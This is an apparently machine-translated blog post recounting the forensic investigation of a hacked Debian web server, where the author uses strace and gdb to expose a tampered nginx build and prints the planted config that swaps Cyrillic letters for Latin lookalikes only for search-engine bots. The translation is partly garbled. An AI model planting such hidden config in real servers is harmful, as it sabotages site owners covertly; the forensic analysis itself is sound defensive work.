He korero tino kino i pa ki tetahi o oku hoa. Engari i te mea he kino ki a Mikhail, he rite tonu te whakangahau ki ahau.
Me kii ahau he tino pai taku hoa UNIX-kaiwhakamahi: ka taea e ia te whakauru i te punaha mysql, php me te hanga i nga whakaritenga ngawari nginx.
A he tatini, kotahi me te haurua ranei nga paetukutuku kua whakatapua ki nga taputapu hanga.
Ko tetahi o enei waahi kua whakatapua ki nga mekameka ka noho pumau ki te TOP o nga miihini rapu. Ko tenei pae he kaiarotake kore-arumoni, engari kua tau tetahi ki te whakaeke. Ko tera DDoS, katahi ka kaha tutu, katahi ka tuhia nga korero kino me te tuku mahi kino ki te manaaki me te RKN.
I ohorere, ka marino nga mea katoa, ka puta mai tenei marino kaore i te pai, ka timata te waahi ki te whakarere i nga rarangi o runga o nga hua rapu.
He korero tera, katahi ko te korero a te kaiwhakahaere.
I te tata ki te moe ka tangi te waea: "San, kaore koe e titiro ki taku tūmau? Ko te ahua ki ahau i taumanutia ahau, kaore e taea e au te whakaatu, engari kaore i mahue te whakaaro i ahau mo te wiki tuatoru. Tera pea kua tae ki te wa mo au ki te rongoa mo te paranoia?"
Ko te mea i muri ko te hawhe haora te korerorero ka taea te whakarapopoto penei:
- he tino momona te oneone mo te mahi hacking;
- ka taea e te kaitawhai te whiwhi mana mo nga kaiwhakamahi super;
- ko te whakaekenga (mehemea i puta) i whaaia ki tenei waahi;
- kua whakatikahia nga waahi raruraru, me mohio noa koe mehemea he urunga;
- kaore i taea e te hack te pa ki te waehere pae me nga papaa raraunga.
Mo te waahi whakamutunga.
Ko te IP ma mua anake ka titiro ki te ao. Kaore he whakawhitinga i waenga i nga pito o muri me te taha o mua engari ko te http(s), he rereke nga kaiwhakamahi/kupuhipa, kaore he kii i whakawhitia. I runga i nga wahitau hina, ka kati nga tauranga katoa engari ko 80/443. E rua noa nga kaiwhakamahi e mohio ana ki nga IP backend ma, e tino whakawhirinaki ana a Mikhail.
Kua whakauruhia ki te taha o mua Debian 9 a, i te wa e karangahia ana, ka wehea te punaha mai i te ao e te paahi o waho ka mutu.
"Ok, homai ki ahau," ka whakatau ahau ki te whakamutu i te moe mo te haora. "Ka kite ahau i oku kanohi ake."
I konei me etahi atu:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Kei te rapu mo te hack ka taea
Ka timata ahau i te tūmau, tuatahi ki roto aratau whakaora. Ka whakairihia e ahau nga kopae ka huri ki roto mana-rākau, hītori, nga raarangi punaha, me etahi atu, i nga wa katoa ka taea, ka tirohia e au nga ra o te waihanga o nga konae, ahakoa e mohio ana ahau kua "kapohia" te kaipakihi noa i muri i a ia, a kua "taahihia" a Misha i a ia e rapu ana i a ia ano. .
Ka tiimata ahau i roto i te aratau noa, kaore ano kia tino marama ki te rapu, ka ako au i nga whirihora. Ko te tuatahi, kei te pirangi au nginx no te mea, i te nuinga o te waa, kaore he mea ke atu i te taha o mua ko tera anake.
He iti nga whirihora, he pai te hanganga ki roto i te tekau ma rua nga konae, ka titiro noa ahau ngeru'oh kotahi i tetahi. Ko nga mea katoa he ma, engari kaore koe e mohio mena kua ngaro ahau i tetahi mea ngā, kia hanga e au he rarangi katoa:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Kaore au i mohio: "Kei hea te raarangi?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Ko te patai tuarua ka taapirihia ki te patai raarangi: "He aha te ahua o te nginx tawhito?"
Hei taapiri, e whakapono ana te punaha kua whakauruhia te putanga hou:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Kei te karanga ahau:
- Misha, he aha koe i huihui ai nginx?
- Taria, kaore au e mohio ki te mahi i tenei!
- Tena ra, moe mai...
Nginx kua tino hanga ano, ka hunahia te putanga o te raarangi ma te whakamahi "-T" mo tetahi take. Karekau he feaa mo te hacking a ka taea e koe te whakaae noa (mai i te mea kua whakakapia e Misha te tūmau me te mea hou) whakaarohia te raru kua whakatauhia.
Ae, i te mea kua riro i tetahi te mana pakiaka'ah, katahi ka tika te mahi tāuta anō pūnaha, a he horihori te rapu he aha te he i reira, engari i tenei wa ka hinga te hiahia ki te moe. Me pehea tatou e mohio ai he aha ta ratou i hiahia kia huna mai i a tatou?
Me ngana ki te whai:
$ strace nginx -T
Ka tirohia e matou, karekau i te rawaka nga rarangi o te tohu a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Mo te ngahau noa, me whakataurite nga kitenga.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ki taku whakaaro he waahanga o te waehere /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
i kawea mai ki te ahua:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
ranei
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
no reira karekau e whakaatuhia te rarangi ingoa na "-T".
Engari me pehea e kite ai i ta maatau whirihora?
Mena kei te tika taku whakaaro, kei te taurangi anake te raru ngx_dump_config me ngana ki te whakauru ma te whakamahi gdb, Waimarie he kii --with-cc-opt -g hakari me te tumanako e arotautanga -O2 e kore e kino ki a tatou. I te wa ano, na te mea kaore au e mohio me pehea ngx_dump_config ka taea te tukatuka i roto take 'T':, e kore matou e karanga i tenei poraka, engari ka whakauruhia ma te whakamahi take 't':
He aha e taea ai e koe te whakamahi '-t' me te '-T'Tukatuka Poraka mena(ngx_dump_config) tupu i roto mena(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Ko te tikanga, mena ka hurihia te waehere i tenei waahanga kaore i roto take 'T':, ka kore taku tikanga e mahi.
Whakamatau nginx.confI te mea kua whakatauhia te raru i roto i nga whakamatautau, kua whakatauhia he iti rawa te whirihoranga mo te mahi kino nginx momo:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Ka whakamahia e matou mo te poto i roto i te tuhinga.
Whakarewahia te patuiro
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Nga taahiraa:
- whakaturia he waahi pakaru i roto i te mahi matua ()
- whakarewahia te kaupapa
- huri i te uara o te taurangi e whakatau ana i te putanga o te whirihora ngx_dump_config=1
- haere tonu/whakamutua te hotaka
Ka kite tatou, he rereke te whirihoranga tuturu mai i a maatau, ka kowhiria e matou he waahanga parapara mai i tera:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Kia titiro tatou ki nga mea kei konei i runga i te raupapa.
Kua whakaritea Kaihoko Kaiwhakamahi'yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Ka whakakorehia nga whaarangi ratonga wordPress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
A mo te hunga ka taka ki raro i nga tikanga e rua o runga ake nei
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
i roto i te tuhinga html-ka huri nga wharangi 'O' i runga i 'o' и 'A' i runga i 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ka tika, ko te hianga anake ko tera 'a' != 'a' rite noa 'o' != 'o':
No reira, ka riro mai i nga karetao miihini rapu, hei utu mo te 100% noa nga tuhinga Cyrillic, he paru kua whakarereketia ki te Latin. 'a' и 'o'. Kaore au e maia ki te matapaki me pehea te paanga o tenei ki a SEO, engari kaore pea ka whai hua te tini o nga reta ki runga i nga waahi o nga hua rapu.
He aha taku korero, e tama ma te pohewa.
tohutoro
Source: will.com